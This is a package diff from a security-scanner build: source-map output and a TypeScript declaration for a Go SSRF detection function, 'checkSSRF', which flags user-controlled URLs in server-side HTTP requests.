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"}

package/dist/src/lib/analyzers/go/security-checks/ssrf-detection.d.ts

@@ -0,0 +1,19 @@
+/**
+ * Go SSRF (Server-Side Request Forgery) Detection
+ * OWASP A10:2025 - Server-Side Request Forgery (SSRF)
+ *
+ * Detects SSRF vulnerabilities where user-controlled input is used in
+ * HTTP requests, file operations, or other server-side requests.
+ */
+import { SecurityVulnerability } from '../../types';
+/**
+ * Checks for SSRF vulnerabilities
+ *
+ * Covers:
+ * - Check #1: User-controlled URLs in HTTP requests (HIGH)
+ *
+ * @param lines - Array of code lines
+ * @returns Array of security vulnerabilities found
+ */
+export declare function checkSSRF(lines: string[]): SecurityVulnerability[];
+//# sourceMappingURL=ssrf-detection.d.ts.map

package/dist/src/lib/analyzers/go/security-checks/ssrf-detection.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"ssrf-detection.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/go/security-checks/ssrf-detection.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAGpD;;;;;;;;GAQG;AACH,wBAAgB,SAAS,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,qBAAqB,EAAE,CAmRlE"}